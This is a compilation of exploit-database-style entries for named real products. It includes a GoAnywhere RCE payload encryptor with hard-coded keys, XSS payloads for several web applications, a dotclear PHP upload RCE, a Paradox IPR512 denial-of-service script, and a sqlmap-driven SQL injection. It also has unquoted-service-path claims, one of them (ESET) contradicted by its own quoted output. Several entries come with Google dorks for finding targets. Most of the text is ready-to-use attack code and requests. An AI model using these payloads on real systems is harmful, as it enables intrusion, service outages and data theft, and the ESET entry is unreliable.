<pre><code>// Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)<br />// Google Dork: title:"GoAnywhere" <br />// Date: 3/26/2023<br />// Exploit Author: Youssef Muhammad<br />// Vendor Homepage: https://www.goanywhere.com/<br />// Software Link: https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0<br />// Version: > 7.1.1 for windows / > 7.0.3 for Linux <br />// Tested on: Windows, Linux<br />// CVE : CVE-2023-0669<br />// This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution <br /><br />import java.util.Base64;<br />import javax.crypto.Cipher;<br />import java.nio.charset.StandardCharsets;<br />import javax.crypto.SecretKeyFactory;<br />import javax.crypto.spec.PBEKeySpec;<br />import javax.crypto.spec.IvParameterSpec;<br />import javax.crypto.spec.SecretKeySpec;<br />import java.nio.file.Files;<br />import java.nio.file.Paths;<br />public class CVE_2023_0669_helper {<br /> static String ALGORITHM = "AES/CBC/PKCS5Padding";<br /> static byte[] KEY = new byte[30];<br /> static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8);<br /> public static void main(String[] args) throws Exception {<br /> if (args.length != 2) {<br /> System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>");<br /> System.exit(1);<br /> }<br /> String filePath = args[0];<br /> String version = args[1];<br /> byte[] fileContent = Files.readAllBytes(Paths.get(filePath));<br /> String encryptedContent = encrypt(fileContent, version);<br /> System.out.println(encryptedContent);<br /> }<br /> public static String encrypt(byte[] data, String version) throws Exception {<br /> Cipher cipher = Cipher.getInstance(ALGORITHM);<br /> KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue();<br /> SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES");<br /> IvParameterSpec ivSpec = new IvParameterSpec(IV);<br /> cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);<br /> byte[] encryptedObject = cipher.doFinal(data);<br /> String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject);<br /> String v = (version.equals("2")) ? "$2" : "";<br /> bundle += v;<br /> return bundle;<br /> }<br /> private static byte[] getInitializationValue() throws Exception {<br /> // Version 1 Encryption<br /> String param1 = "go@nywhereLicenseP@$$wrd";<br /> byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85};<br /> return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded();<br /> }<br /> private static byte[] getInitializationValueV2() throws Exception {<br /> // Version 2 Encryption<br /> String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R";<br /> byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};<br /> return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded();<br /> }<br />}<br /> <br /><br /></code></pre>
<pre><code>Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)<br />Application: WebsiteBaker<br />Version: 2.13.3<br />Bugs: Stored XSS<br />Technology: PHP<br />Vendor URL: https://websitebaker.org/pages/en/home.php<br />Software Link: https://wiki.websitebaker.org/doku.php/en/downloads<br />Date of found: 02.04.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps: <br /><br />1.Anyone who has the authority to create the page can do this<br />payload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3E<br /><br /><br />POST /admin/pages/add.php HTTP/1.1<br />Host: localhost<br />Content-Length: 137<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: null<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9<br />Connection: close<br /><br />b7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add<br /><br /><br /><br />2. Visit http://localhost/<br /><br /></code></pre>
<pre><code># Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)<br /># Date: 2023-03-30<br /># CVE: CVE-2023-26692<br /># Exploit Author: Abdulaziz Saad (@b4zb0z)<br /># Vendor Homepage: https://www.zcbs.nl<br /># Version: 4.14k<br /># Tested on: LAMP, Ubuntu<br /># Google Dork: inurl:objecten.pl?ident=3D<br /><br />---<br /><br />[#] Vulnerability :<br /><br />`$_GET['ident']`<br /><br /><br />[#] Exploitation :<br /><br />`https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror=<br />=3Dalert(%22XSS%22)%3E`<br /><br /></code></pre>
<pre><code># Exploit Title: ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path<br /># Exploit Author: Milad Karimi (Ex3ptionaL)<br /># Exploit Date: 2023-04-05<br /># Vendor : https://www.eset.com<br /># Version : 16.0.26.0<br /># Tested on OS: Microsoft Windows 11 pro x64<br /><br />#PoC :<br />==============<br /><br />C:\>sc qc ekrn<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: ekrn<br /> TYPE : 20 WIN32_SHARE_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe"<br /> LOAD_ORDER_GROUP : Base<br /> TAG : 0<br /> DISPLAY_NAME : ESET Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /></code></pre>
<pre><code>Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)<br />Application: dotclear<br />Version: 2.25.3<br />Bugs: Remote Code Execution (RCE) (Authenticated) via file upload<br />Technology: PHP<br />Vendor URL: https://dotclear.org/<br />Software Link: https://dotclear.org/download<br />Date of found: 08.04.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />While writing a blog post, we know that we can upload images. But php did not allow file upload. This time<br /><?php echo system("id"); ?><br /> I wrote a file with the above payload, a poc.phar extension, and uploaded it.<br />We were able to run the php code when we visited your page<br /><br /><br />poc request:<br /><br /><br />POST /dotclear/admin/post.php HTTP/1.1<br />Host: localhost<br />Content-Length: 566<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1cc<br />Connection: close<br /><br />post_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password=<br /><br /><br /><br />poc video : https://youtu.be/oIPyLqLJS70<br /><br /><br /></code></pre>
<pre><code>#!/bin/bash<br /><br /># Exploit Title: Paradox Security Systems IPR512 - Denial Of Service<br /># Google Dork: intitle:"ipr512 * - login screen"<br /># Date: 09-APR-2023<br /># Exploit Author: Giorgi Dograshvili<br /># Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423)<br /># Version: IPR512<br /># CVE : CVE-2023-24709<br /><br /># Function to display banner message<br />display_banner() {<br /> echo "******************************************************"<br /> echo "* *"<br /> echo "* PoC CVE-2023-24709 *"<br /> echo "* BE AWARE!!! RUNNING THE SCRIPT WILL MAKE *"<br /> echo "* A DAMAGING IMPACT ON THE SERVICE FUNCTIONING! *"<br /> echo "* by SlashXzerozero *"<br /> echo "* *"<br /> echo "******************************************************"<br />}<br /><br /># Call the function to display the banner<br />display_banner<br /> echo ""<br /> echo ""<br /> echo "Please enter a domain name or IP address with or without port"<br />read -p "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain<br /><br /># Step 2: Ask for user confirmation<br />read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm<br />if [[ $confirm == "Y" || $confirm == "y" ]]; then<br /> # Display loading animation<br /> animation=("|" "/" "-" "\\")<br /> index=0<br /> while [[ $index -lt 10 ]]; do<br /> echo -ne "Loading ${animation[index]} \r"<br /> sleep 1<br /> index=$((index + 1))<br /> done<br /><br /> # Use curl to send HTTP GET request with custom headers and timeout<br /> response=$(curl -i -s -k -X GET \<br /> -H "Host: $domain" \<br /> -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \<br /> -H "Accept: */" \<br /> -H "Referer: http://$domain/login.html" \<br /> -H "Accept-Encoding: gzip, deflate" \<br /> -H "Accept-Language: en-US,en;q=0.9" \<br /> -H "Connection: close" \<br /> --max-time 10 \<br /> "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982")<br /><br /> # Check response for HTTP status code 200 and print result<br /> if [[ $response == *"HTTP/1.1 200 OK"* ]]; then<br /> echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html"<br /> else<br /> echo -e "\nShouldn't be vulnerable! Please check the webpanel: http://$domain/login.html"<br /> fi<br />else<br /> echo "The script is stopped!."<br />fi<br /><br /></code></pre>
<pre><code># Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)<br /># Exploit Author: omurugur<br /># Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020<br /># Version: 6.5.0 - 6.2.0 - 6.1.0<br /># Tested on: [relevant os]<br /># CVE : CVE-2022-0020<br /># Author Web: https://www.justsecnow.com<br /># Author Social: @omurugurrr<br /><br /><br />A stored cross-site scripting (XSS) vulnerability in Palo Alto Network<br />Cortex XSOAR web interface enables an authenticated network-based attacker<br />to store a persistent javascript payload that will perform arbitrary<br />actions in the Cortex XSOAR web interface on behalf of authenticated<br />administrators who encounter the payload during normal operations.<br /><br />POST /acc_UAB(MAY)/incidentfield HTTP/1.1<br />Host: x.x.x.x<br />Cookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x;<br />isTimLicense=false<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0)<br />Gecko/20100101 Firefox/94.0<br />Accept: application/json<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: https://x.x.x.x/acc_UAB(MAY)<br />Content-Type: application/json<br />X-Xsrf-Token:<br />Api_truncate_results: true<br />Origin: https://x.x.x.x<br />Content-Length: 373<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br />{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Field<br />edited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}<br /><br />Regards,<br /><br />Omur UGUR<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)<br /># Exploit Author: omurugur<br /># Vendor Homepage: https://support.broadcom.com/external/content/SecurityAdvisories/0/21117<br /># Version: 10.7.4-10.7.13<br /># Tested on: [relevant os]<br /># CVE : CVE-2022-25630<br /># Author Web: https://www.justsecnow.com<br /># Author Social: @omurugurrr<br /><br /><br />An authenticated user can embed malicious content with XSS into the admin<br />group policy page.<br /><br />Example payload<br /><br />*"/><svg/onload=prompt(document.domain)>*<br /><br /><br />POST /brightmail/admin/administration/AdminGroupPolicyFlow$save.flo<br />HTTP/1.1<br />Host: X.X.X.X<br />Cookie: JSESSIONID=xxxxx<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0)<br />Gecko/20100101 Firefox/99.0<br />Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 652<br />Origin: https://x.x.x.x<br />Referer:<br />https://x.x.x.x/brightmail/admin/administration/AdminGroupPolicyFlow$add.flo<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br />Connection: close<br /><br />pageReuseFor=add&symantec.brightmail.key.TOKEN=xxx&adminGroupName=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=&fullAdminRole=true&statusRole=true&statusViewOnly=false&reportRole=true&reportViewOnly=false&policyRole=true&policyViewOnly=false&settingRole=true&settingViewOnly=false&adminRole=true&adminViewOnly=false&submitRole=true&submitViewOnly=false&quarantineRole=true&quarantineViewOnly=false&selectedFolderRights=2&ids=0&complianceFolderIds=1&selectedFolderRights=2&ids=0&complianceFolderIds=10000000<br /><br /><br />Regards,<br /><br />Omur UGUR<br /><br /></code></pre>
<pre><code># Exploit Title: Medicine Tracker System v1.0 - Sql Injection <br /># Exploit Author: Sanjay Singh<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link:<br />https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip<br /># Version: V1.0.0<br /># Tested on: Windows/Linux<br /><br /><br /># Proof of Concept:<br /># 1- http://localhost/php-mts/app/login.php<br /># 2- login with default credential <br /># 3- Click left side Manage account and fill Update User Details and click update account<br /># 4- Capture request using burp suite <br /># 5- Save request request.txt <br /><br /><br />Sqlmap <br /><br />POST /php-mts/classes/Users.php?f=save_user HTTP/1.1<br />Host: localhost<br />Content-Length: 661<br />sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeOo3CzyRX6fHexZx<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/php-mts/app/?page=manage_account<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql<br />Connection: close<br /><br />------WebKitFormBoundaryeOo3CzyRX6fHexZx<br />Content-Disposition: form-data; name="id"<br /><br />1'-'<br />------WebKitFormBoundaryeOo3CzyRX6fHexZx<br />Content-Disposition: form-data; name="firstname"<br /><br />gogo<br />------WebKitFormBoundaryeOo3CzyRX6fHexZx<br />Content-Disposition: form-data; name="middlename"<br /><br />ogo<br />------WebKitFormBoundaryeOo3CzyRX6fHexZx<br />Content-Disposition: form-data; name="lastname"<br /><br />singh<br />------WebKitFormBoundaryeOo3CzyRX6fHexZx<br />Content-Disposition: form-data; name="username"<br /><br />mayuri.infospace@gmail.com<br />------WebKitFormBoundaryeOo3CzyRX6fHexZx<br />Content-Disposition: form-data; name="password"<br /><br />12345678<br />------WebKitFormBoundaryeOo3CzyRX6fHexZx--<br /><br /><br /><br /><br /><br />sqlmap<br /><br />sqlmap -r request.txt -p "id" --dbs --batch <br /> ___<br /> __H__ <br /> ___ ___["]_____ ___ ___ {1.6.12#stable} <br />|_ -| . ['] | .'| . | <br />|___|_ [(]_|_|_|__,| _| <br /> |_|V... |_| https://sqlmap.org <br /><br />[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program<br /><br />[*] starting @ 13:18:01 /2023-03-21/<br /><br />[13:18:01] [INFO] parsing HTTP request from 'request.txt'<br />it appears that provided value for POST parameter 'id' has boundaries. Do you want to inject inside? ('' or true*--') [y/N] N<br />[13:18:01] [INFO] resuming back-end DBMS 'mysql' <br />[13:18:01] [INFO] testing connection to the target URL<br />[13:18:01] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests<br />sqlmap resumed the following injection point(s) from stored session:<br />---<br />Parameter: id (POST)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: id=' or true AND (SELECT 3138 FROM(SELECT COUNT(*),CONCAT(0x7178787171,(SELECT (ELT(3138=3138,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mDhI--&name=para&description=ss<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=' or true AND (SELECT 8994 FROM (SELECT(SLEEP(5)))doso)-- HjCh--&name=para&description=ss<br />---<br />[13:18:01] [INFO] the back-end DBMS is MySQL<br />web application technology: Apache 2.4.54, PHP 8.0.25<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br />[13:18:01] [INFO] fetching database names<br />[13:18:01] [INFO] resumed: 'information_schema'<br />[13:18:01] [INFO] resumed: 'art_gallery'<br />[13:18:01] [INFO] resumed: 'hcpms'<br />[13:18:01] [INFO] resumed: 'mts_db'<br />[13:18:01] [INFO] resumed: 'mysql'<br />[13:18:01] [INFO] resumed: 'performance_schema'<br />[13:18:01] [INFO] resumed: 'phpmyadmin'<br />[13:18:01] [INFO] resumed: 'sscdms_db'<br />[13:18:01] [INFO] resumed: 'test'<br />available databases [9]:<br />[*] art_gallery<br />[*] hcpms<br />[*] information_schema<br />[*] mts_db<br />[*] mysql<br />[*] performance_schema<br />[*] phpmyadmin<br />[*] sscdms_db<br />[*] test<br /><br />[13:18:01] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.2'<br /><br />[*] ending @ 13:18:01 /2023-03-21/<br /><br /><br /></code></pre>
<pre><code># Exploit Title: ActFax 10.10 - Unquoted Path Services<br /># Date: 22/03/2023<br /># Exploit Author: Birkan ALHAN (@taftss)<br /># Vendor Homepage: https://www.actfax.com<br /># Software Link: https://www.actfax.com/en/download.html<br /># Version: Version 10.10, Build 0551 (2023-02-01)<br /># Tested on: Windows 10 21H2 OS Build 19044.2728<br /><br />#Discover to Unquoted Services Path:<br /><br />C:\Users\taftss>sc qc ActiveFaxServiceNT<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: ActiveFaxServiceNT<br />TYPE : 10 WIN32_OWN_PROCESS<br />START_TYPE : 2 AUTO_START<br />ERROR_CONTROL : 1 NORMAL<br />BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe<br />LOAD_ORDER_GROUP :<br />TAG : 0<br />DISPLAY_NAME : ActiveFax-Server-Service<br />DEPENDENCIES :<br />SERVICE_START_NAME : LocalSystem<br /><br />C:\Users\taftss>systeminfo<br /><br />Host Name: RedsTaftss<br />OS Name: Microsoft Windows 10 Pro<br />OS Version: 10.0.19044 N/A Build 19044<br /><br />#Another Discover Methot to Unquoted Services Path:<br /><br />wmic service get name,displayname,pathname,startmode | findstr /i<br />"auto" | findstr /i /v "c:\windows\\" | findstr /i /v """<br /><br />#Exploit:<br /><br />If the attacker has taken over the system and the taken user has write<br />privileges to the "C:\Program Files\ActiveFax" folder or "C:\", they<br />can inject their own malicious "ActSrvNT.exe" file. Then the<br />ActiveFaxServiceNT Service can be restarted to privilege escalation.<br /><br />--<br />*Birkan ALHAN*<br /><br /></code></pre>